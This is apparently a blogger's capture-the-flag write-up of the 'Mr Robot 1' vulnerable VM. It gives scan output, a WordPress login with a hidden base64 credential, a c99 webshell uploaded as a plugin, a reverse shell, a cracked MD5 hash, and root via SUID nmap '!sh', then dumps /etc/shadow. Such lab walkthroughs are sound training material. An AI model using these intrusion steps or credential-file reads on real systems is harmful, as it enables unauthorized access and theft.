Contents

1

Mr Robot 1

This one is finally decently recent, hopefully that’ll mean it’ll be harder!

└─$ nmap -nP 10.10.10.0/24
Warning:  You are not root -- using TCP pingscan rather than ICMP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 18:45 EST
Nmap scan report for 10.10.10.9
Host is up (0.000081s latency).
All 1000 scanned ports on 10.10.10.9 are closed

Nmap scan report for 10.10.10.12
Host is up (0.00099s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

Nmap done: 256 IP addresses (2 hosts up) scanned in 6.71 seconds

Okay, seems like this is a generic web-server setup! Just to be sure, I checked all ports with -p- but it came up dry.

I then began checking out the web service with a browser, and I must say the Author did a great job with this one! Loading went through a little boot sequence for a Unix system, and now I’ve been dropped at what appears to be a shell emulation! Fun!
2

I ran prepare, and a little video played:
3

I checked robots.txt:
19

And found the first key:
20

Then it dropped me back to the same (I assume) shell:
4

The page source is mostly Javascript:

<!doctype html>
<!--
\   //~~\ |   |    /\  |~~\|~~  |\  | /~~\~~|~~    /\  |  /~~\ |\  ||~~
 \ /|    ||   |   /__\ |__/|--  | \ ||    | |     /__\ | |    || \ ||--
  |  \__/  \_/   /    \|  \|__  |  \| \__/  |    /    \|__\__/ |  \||__
-->
<html class="no-js" lang="">
  <head>
    

    <link rel="stylesheet" href="css/main-600a9791.css">

    <script src="js/vendor/vendor-48ca455c.js"></script>

    <script>var USER_IP='208.185.115.6';var BASE_URL='index.html';var RETURN_URL='index.html';var REDIRECT=false;window.log=function(){log.history=log.history||[];log.history.push(arguments);if(this.console){console.log(Array.prototype.slice.call(arguments));}};</script>

  </head>
  <body>
    <!--[if lt IE 9]>
      <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
    

    <!-- Google Plus confirmation -->
    <div id="app"></div>

    
    <script src="js/s_code.js"></script>
    <script src="js/main-acba06a5.js"></script>
</body>
</html>

command fsociety plays a little video again…

inform gives us a slideshow (I didn’t read through, trying to speedrun here)
5

question is another slideshow, wakeup is another video.

Join has you enter your email address, the server has no real internet connectivity so, this wont do anything I assume. I try a few cheeky tests real quick.
6

Okay, that’s the site explored as a user. There’s two places where user input are accpeted, the entry shell and the join shell. We may come back to those later.

Let’s see what Nikto finds:

─$ nikto --host 10.10.10.12             
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.12
+ Target Hostname:    10.10.10.12
+ Target Port:        80
+ Start Time:         2021-01-12 18:57:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://10.10.10.12/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7863 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2021-01-12 19:00:29 (GMT-5) (186 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# I think port 80 redirects to 443 everywhere, but just to be sure:
└─$ nikto --host 10.10.10.12 --port 443
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.12
+ Target Hostname:    10.10.10.12
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /CN=www.example.com
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /CN=www.example.com
+ Start Time:         2021-01-12 19:04:27 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Hostname '10.10.10.12' does not match certificate\'s names: www.example.com
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <https://10.10.10.12/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the secure flag
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7863 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2021-01-12 19:07:48 (GMT-5) (201 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# Rude redirect loop at /admin
└─$ curl https://10.10.10.12/admin --insecure 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://10.10.10.12/admin/">here</a>.</p>
</body></html>

# This is fun
└─$ curl https://10.10.10.12/readme -insecure
I like where you head is at. However I\'m not going to help you.

# Check that little param for sql injection?
└─$ sqlmap https://10.10.10.12/?p=23 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:20:48 /2021-01-12/

[19:20:48] [INFO] testing connection to the target URL
[19:20:48] [INFO] testing if the target URL content is stable
[19:20:49] [INFO] target URL content is stable
[19:20:49] [INFO] testing if GET parameter 'p' is dynamic
[19:20:49] [WARNING] GET parameter 'p' does not appear to be dynamic
[19:20:49] [WARNING] heuristic (basic) test shows that GET parameter 'p' might not be injectable
[19:20:49] [INFO] testing for SQL injection on GET parameter 'p'
[19:20:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:20:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:20:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:20:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:20:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[19:20:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:20:49] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:20:49] [INFO] testing 'Generic inline queries'
[19:20:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:20:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:20:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:20:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:20:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:20:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[19:20:50] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[19:20:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:20:55] [WARNING] GET parameter 'p' does not seem to be injectable
[19:20:55] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'                                                                                                                             

[*] ending @ 19:20:55 /2021-01-12/

That script does indeed disclose the Wordpress version:
7

└─$ searchsploit wordpress 4.3.1
------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
WordPress Core < 4.7.1 - Username Enumeration                                 | php/webapps/41497.php
WordPress Core < 4.7.4 - Unauthorized Password Reset                          | linux/webapps/41963.txt
WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion              | php/webapps/44949.txt
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts       | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service                       | php/dos/47800.py
WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)   | php/remote/47187.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities           | php/webapps/39553.txt
WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities          | php/webapps/38176.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                     | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection                   | php/webapps/48918.sh
WordPress Plugin User Role Editor < 4.25 - Privilege Escalation               | php/webapps/44595.rb
WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass                   | php/webapps/43117.txt
WordPress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation    | php/webapps/46083.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Okay… some of that could be useful, let’s keep exploring…

$ curl https://10.10.10.12/license.txt --insecure
what you do just pull code from Rapid9 or some [email protected]#% since when did you become a script kitty?
...
# A lot of whitespace
...
what you do just pull code from Rapid9 or some [email protected]#% since when did you become a script kitty?
...
# A lot of whitespace
...
ZWxsaW90OkVSMjgtMDY1Mgo=

$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 --decode
elliot:ER28-0652

$ ssh [email protected]
ssh: connect to host 10.10.10.12 port 22: Connection refused

Oh, I’m just noticing port 22 is closed! Okay well, let’s try it on the wp-login page? Yep, bingo:
8

Getting a list of installed plugin’s and versions is very useful to us:
9

We can likely find something here to give us an RCE or something, but let’s just keep poking around for now. Wait, we can upload a plugin… This has to be an RCE?

I did a quick search, and sure enough we should be guaranteed a metrepreter session with any wordpress version at this point! Let’s do that:

$ msfconsole
...

So I messed about with the metasploit module for about 5 minutes, it seems to not be working. I think the issue is the insecure TLS connection. So I’m just going to run the damn exploit myself.

Turns out, we can just upload any old PHP webshell. I’ll upload c99…

Okay maybe I read that too fast hahaha
10

Apparently you just need to add a little header onto the file, like this:

/**
 * Plugin Name: YOUR PLUGIN NAME
 */

I added that to the file and tried uploading again… failed again. I looked up the error and it’s just because I need to upload a .zip archive. I created one, and then got success!
11

Once I clicked activate on the plugin, I get this hilariously tiny shell window… This is way more than I needed honestly I just wanted a simple shell… oh well let’s see what we can do.
12

Some quick CSS editing and I get a larger window, looks like the shell I downloaded wasn’t in english LOL.
13

I also figured out I can just access the shell at server root directory:
14
Clicking the php link:
15
Much better…
16

I still hate this UI so I want to get a reverse shell going, but I can’t seem to get it to connect… I confirmed nc and bash are accessible to me, and that I can reach my machine…

It seems like we can’t actually get and output from executing nc, perhaps this is a phony?

Sigh, whatever I can get a better shell with PHP… I’m using the same attack vector to upload a simple reverse shell I hate this C99 thing.

Ah, finally:
17

Now, let’s get root!

$ python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
[email protected]:~$ cd /home
cd /home
[email protected]:/home$ ls
ls
robot
[email protected]:/home$ cd robot
cd robot
[email protected]:/home/robot$ ls
ls
key-2-of-3.txt  password.raw-md5
[email protected]:/home/robot$ ls -al
ls -al
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
[email protected]:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
[email protected]:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

I got an instant crack for this one on crackstation:
18

[email protected]:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

[email protected]:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
82***59

I wonder if that string has any significance… I tried to check for other users and use it as a password but no dice.

varnish:x:999:999::/home/varnish:
robot:x:1002:1002::/home/robot:
[email protected]:~$ su varnish
su varnish
Password: 822c73956184f694993bede3eb39f959

su: Authentication failure

Alright well - time to get root! I thought I had a quick win here…

[email protected]:/var$ cd ba
cd backups/
[email protected]:/var/backups$ ls 
ls
apt.extended_states.0  group.bak    passwd.bak
dpkg.status.0          gshadow.bak  shadow.bak
[email protected]:/var/backups$ cat sh
cat shadow.bak 
cat: shadow.bak: Permission denied
[email protected]:/var/backups$ ls -al
ls -al
total 356
drwxr-xr-x  2 root root     4096 Nov 13  2015 .
drwxr-xr-x 11 root root     4096 Jun 24  2015 ..
-rw-r--r--  1 root root     7194 Jun 24  2015 apt.extended_states.0
-rw-r--r--  1 root root   331144 Jun 24  2015 dpkg.status.0
-rw-------  1 root root      604 Nov 13  2015 group.bak
-rw-------  1 root shadow    496 Nov 13  2015 gshadow.bak
-rw-------  1 root root     1217 Nov 13  2015 passwd.bak
-rw-------  1 root shadow    885 Nov 13  2015 shadow.bak

Not quite ;)

# Nothing useful...
[email protected]:/$ find . -readable -and -user robot 2>/dev/null
find . -readable -and -user robot 2>/dev/null
./home/robot/password.raw-md5
./home/robot/key-2-of-3.txt
./proc/2308
./proc/2308/task
./proc/2308/task/2308
./proc/2308/task/2308/fd
...
[email protected]:/$ ps aux | grep root
ps aux | grep root
root         1  0.0  0.2  33344  1396 ?        Ss   18:44   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    18:44   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    18:44   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   18:44   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    18:44   0:01 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    18:44   0:01 [rcuos/0]
root         9  0.0  0.0      0     0 ?        S    18:44   0:00 [rcu_bh]
root        10  0.0  0.0      0     0 ?        S    18:44   0:00 [rcuob/0]
root        11  0.0  0.0      0     0 ?        S    18:44   0:00 [migration/0]
root        12  0.0  0.0      0     0 ?        S    18:44   0:00 [watchdog/0]
root        13  0.0  0.0      0     0 ?        S<   18:44   0:00 [khelper]
root        14  0.0  0.0      0     0 ?        S    18:44   0:00 [kdevtmpfs]
root        15  0.0  0.0      0     0 ?        S<   18:44   0:00 [netns]
root        16  0.0  0.0      0     0 ?        S<   18:44   0:00 [writeback]
root        17  0.0  0.0      0     0 ?        S<   18:44   0:00 [kintegrityd]
root        18  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
root        19  0.0  0.0      0     0 ?        S<   18:44   0:00 [kworker/u3:0]
root        20  0.0  0.0      0     0 ?        S<   18:44   0:00 [kblockd]
root        21  0.0  0.0      0     0 ?        S<   18:44   0:00 [ata_sff]
root        22  0.0  0.0      0     0 ?        S    18:44   0:00 [khubd]
root        23  0.0  0.0      0     0 ?        S<   18:44   0:00 [md]
root        24  0.0  0.0      0     0 ?        S<   18:44   0:00 [devfreq_wq]
root        25  0.0  0.0      0     0 ?        S    18:44   0:00 [kworker/0:1]
root        27  0.0  0.0      0     0 ?        S    18:44   0:00 [khungtaskd]
root        28  0.0  0.0      0     0 ?        S    18:44   0:00 [kswapd0]
root        29  0.0  0.0      0     0 ?        SN   18:44   0:00 [ksmd]
root        30  0.0  0.0      0     0 ?        S    18:44   0:00 [fsnotify_mark]
root        31  0.0  0.0      0     0 ?        S    18:44   0:00 [ecryptfs-kthrea]
root        32  0.0  0.0      0     0 ?        S<   18:44   0:00 [crypto]
root        44  0.0  0.0      0     0 ?        S<   18:44   0:00 [kthrotld]
root        46  0.0  0.0      0     0 ?        S    18:44   0:00 [scsi_eh_0]
root        47  0.0  0.0      0     0 ?        S    18:44   0:00 [scsi_eh_1]
root        49  0.0  0.0      0     0 ?        S    18:44   0:00 [kworker/u2:3]
root        68  0.0  0.0      0     0 ?        S<   18:44   0:00 [deferwq]
root        69  0.0  0.0      0     0 ?        S<   18:44   0:00 [charger_manager]
root       114  0.0  0.0      0     0 ?        S<   18:44   0:00 [kpsmoused]
root       128  0.0  0.0      0     0 ?        S<   18:44   0:00 [kworker/u3:1]
root       129  0.0  0.0      0     0 ?        S    18:44   0:00 [jbd2/sda1-8]
root       130  0.0  0.0      0     0 ?        S<   18:44   0:00 [ext4-rsv-conver]
root       143  0.0  0.0      0     0 ?        S    18:44   0:00 [kworker/0:2]
root       273  0.0  0.0  19472   476 ?        S    18:44   0:00 upstart-udev-bridge --daemon
root       277  0.0  0.1  49964   504 ?        Ss   18:44   0:00 /lib/systemd/systemd-udevd --daemon
root       366  0.0  0.0  15272   236 ?        S    18:44   0:00 upstart-file-bridge --daemon
root       650  0.0  0.1  10220   792 ?        Ss   18:44   0:00 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root       975  0.0  0.0  15388   420 ?        S    18:44   0:00 upstart-socket-bridge --daemon
root      1011  0.0  0.0  14536    40 tty5     Ss+  18:44   0:00 /sbin/getty -8 38400 tty5
root      1017  0.0  0.0  14536    40 tty2     Ss+  18:44   0:00 /sbin/getty -8 38400 tty2
root      1018  0.0  0.0  14536    40 tty3     Ss+  18:44   0:00 /sbin/getty -8 38400 tty3
root      1023  0.0  0.0  14536    40 tty6     Ss+  18:44   0:00 /sbin/getty -8 38400 tty6
root      1050  0.0  0.0  23536   152 ?        Ss   18:44   0:00 /usr/sbin/vsftpd
root      1053  0.0  0.0  23652     0 ?        Ss   18:44   0:00 cron
root      1200  0.0  0.0   4440    36 ?        S    18:44   0:00 /bin/sh /opt/bitnami/mysql/bin/mysqld_safe --defaults-file=/opt/bitnami/mysql/my.cnf --port=3306 --socket=/opt/bitnami/mysql/tmp/mysql.sock --datadir=/opt/bitnami/mysql/data --log-error=/opt/bitnami/mysql/data/mysqld.log --pid-file=/opt/bitnami/mysql/data/mysqld.pid --lower-case-table-names=1
root      1557  0.0  0.0  14536   192 tty4     Ss+  18:44   0:00 /sbin/getty -8 38400 tty4
root      1566  0.0  1.0 258616  5184 ?        Ss   18:44   0:00 php-fpm: master process (/opt/bitnami/php/etc/php-fpm.conf)                                                                                                                                                                                                                          
root      1573  0.0  4.0 207948 20104 ?        Ss   18:44   0:00 /opt/bitnami/apache2/bin/httpd.bin -f /opt/bitnami/apache2/conf/httpd.conf -DDISABLE_BANNER
root      1721  0.0  0.2 104328  1068 ?        Sl   18:44   0:00 /usr/bin/monit -c /etc/monit/monitrc
root      1746  0.0  0.0  14536   452 tty1     Ss+  18:44   0:00 /sbin/getty -8 38400 tty1
root      1866  0.0  0.0      0     0 ?        S    19:15   0:00 [kworker/u2:0]
root      1938  0.0  0.0      0     0 ?        S    19:47   0:00 [kauditd]
root      2307  0.0  0.2  46624  1460 pts/0    S    20:34   0:00 su robot
robot     2351  0.0  0.1  10464   916 pts/0    S+   20:42   0:00 grep root

Oh, by the way, there’s a bunch of kernel exploits I could easily use to get root but that just seems too easy?

Moving on…

[email protected]:/etc$ cat crontab
cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
19 * * * * bitnami cd /opt/bitnami/stats && ./agent.bin --run -D

That last one looks interesting…

[email protected]:/opt/bitnami/stats$ ls -al
ls -al
total 5864
drwxr-xr-x  2 bitnamiftp bitnami    4096 Jan 12 18:41 .
drwxr-xr-x 15 root       root       4096 Nov 13  2015 ..
-rwxr-xr-x  1 bitnamiftp bitnami 3742628 Oct 20  2014 agent.bin
-rw-r--r--  1 bitnamiftp bitnami     216 Jan 12 18:41 agent.conf
-rw-r--r--  1 bitnamiftp bitnami 2235111 Oct 20  2014 agent.exe
-rw-rw-r--  1 bitnamiftp bitnami     157 Nov 13  2015 agent.log
-rw-r--r--  1 bitnamiftp bitnami    1334 Sep  3  2012 cert.pem
-rw-r--r--  1 bitnamiftp bitnami     723 Nov 13  2015 settings.db

Meh I can’t figure out immedately anything to do with this.

[email protected]:/$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
# nmap is on gtfo bins?
[email protected]:/$ ls -al /usr/local/bin/nmap
ls -al /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
# It's owned by root!
[email protected]:/$ nmap --interactive
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cat /etc/shadow
cat /etc/shadow
root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7:::
daemon:*:16610:0:99999:7:::
bin:*:16610:0:99999:7:::
sys:*:16610:0:99999:7:::
sync:*:16610:0:99999:7:::
games:*:16610:0:99999:7:::
man:*:16610:0:99999:7:::
lp:*:16610:0:99999:7:::
mail:*:16610:0:99999:7:::
news:*:16610:0:99999:7:::
uucp:*:16610:0:99999:7:::
proxy:*:16610:0:99999:7:::
www-data:*:16610:0:99999:7:::
backup:*:16610:0:99999:7:::
list:*:16610:0:99999:7:::
irc:*:16610:0:99999:7:::
gnats:*:16610:0:99999:7:::
nobody:*:16610:0:99999:7:::
libuuid:!:16610:0:99999:7:::
syslog:*:16610:0:99999:7:::
sshd:*:16610:0:99999:7:::
ftp:*:16610:0:99999:7:::
bitnamiftp:$6$saPiFTAH$7K09sg5oIfkIs5kuMx1R/Um4HNd8O6vF2n8oICEom8VVer0BYATY5wtzdPdP3JeuKbZ4RYBml0THNQv8TSc0s/:16751:0:99999:7:::
mysql:!:16694:0:99999:7:::
varnish:!:16694::::::
robot:$6$HmQCDKcM$mcINMrQFa0Qm7XaUaS5xLEBSeP3bUkr18iwgwTAL8AIfUDYBWG5L8J9.Ukb3gVWUQoYam4G0m.I5qaHBnTddK/:16752:0:99999:7:::
$ cd /root
$ ls -al
ls -al
total 32
drwx------  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
-rw-------  1 root root 4058 Nov 14  2015 .bash_history
-rw-r--r--  1 root root 3274 Sep 16  2015 .bashrc
drwx------  2 root root 4096 Nov 13  2015 .cache
-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root 1024 Sep 16  2015 .rnd
$ cat key-3-of-3.txt
cat key-3-of-3.txt
04***e4

We win! This one was actually quite easy, but also quite fun due to all the effort the author put into the story.

Directory
$ cd content && tree